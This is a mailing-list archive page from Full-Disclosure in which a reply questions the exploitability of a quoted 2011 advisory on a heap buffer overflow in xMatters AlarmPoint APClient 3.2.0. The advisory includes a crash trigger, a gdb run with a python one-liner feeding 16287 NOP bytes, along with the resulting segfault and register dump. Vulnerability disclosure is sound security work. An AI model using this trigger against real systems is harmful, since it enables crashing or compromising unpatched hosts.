[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient



Is the suid bit set on that binary? Otherwise, unless I'm missing something
it doesn't seem to be exploitable by an attacker...

On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco
<jsacco@xxxxxxxxxxxxxxxxxxxxxx>wrote:

>  Information
>  --------------------
>  Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
>  Version: APClient 3.2.0 (native)
>  Software : xMatters AlarmPoint
>  Vendor Homepage : http://www.xmatters.com
>  Vulnerability Type : Heap Buffer Overflow
>  Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
>  Severity : High
>  Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
>  Description
>  ------------------
>  The AlarmPoint Java Server consists of a collection of software
>  components and software APIs designed to provide a flexible and
>  powerful set of tools for integrating various applications to
>  AlarmPoint.
>
>  Details
>  -------------------
>  AlarmPoint APClient is affected by a Heap Overflow vulnerability in
>  version APClient 3.2.0 (native)
>
>  A heap overflow condition is a buffer overflow, where the buffer that
>  can be overwritten is allocated in the heap portion of memory, generally
>  meaning that the buffer was allocated using a routine such as the POSIX
>  malloc() call.
>  https://www.owasp.org/index.php/Heap_overflow
>
>
>  Exploit as follow:
>  Submit a malicious file cointaining the exploit
>  root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$
>  ./APClient.bin --submit-file maliciousfile.hex
>  or
>  (gdb) run `python -c 'print "\x90"*16287'`
>  Starting program:
>  /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
>  'print "\x90"*16287'`
>
>  Program received signal SIGSEGV, Segmentation fault.
>  0x0804be8a in free ()
>  (gdb) i r
>  eax            0xa303924        170932516
>  ecx            0xbfb8   49080
>  edx            0xa303924        170932516
>  ebx            0x8059438        134583352
>  esp            0xbfff3620       0xbfff3620
>  ebp            0xbfff3638       0xbfff3638
>  esi            0x8059440        134583360
>  edi            0x80653f0        134632432
>  eip            0x804be8a        0x804be8a <free+126>
>  eflags         0x210206 [ PF IF RF ID ]
>  cs             0x73     115
>  ss             0x7b     123
>  ds             0x7b     123
>  es             0x7b     123
>  fs             0x0      0
>  gs             0x33     51
>  (gdb)
>
>
>  Solution
>  -------------------
>  No patch are available at this time.
>
>  Credits
>  -------------------
>  Manual discovered by Insecurity Research Labs
>  Juan Sacco - http://www.insecurityresearch.com
>
> --
>  --
>  _________________________________________________
>  Insecurity Research - Security auditing and testing software
>  Web: http://www.insecurityresearch.com
>  Insect Pro 2.5 was released stay tunned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/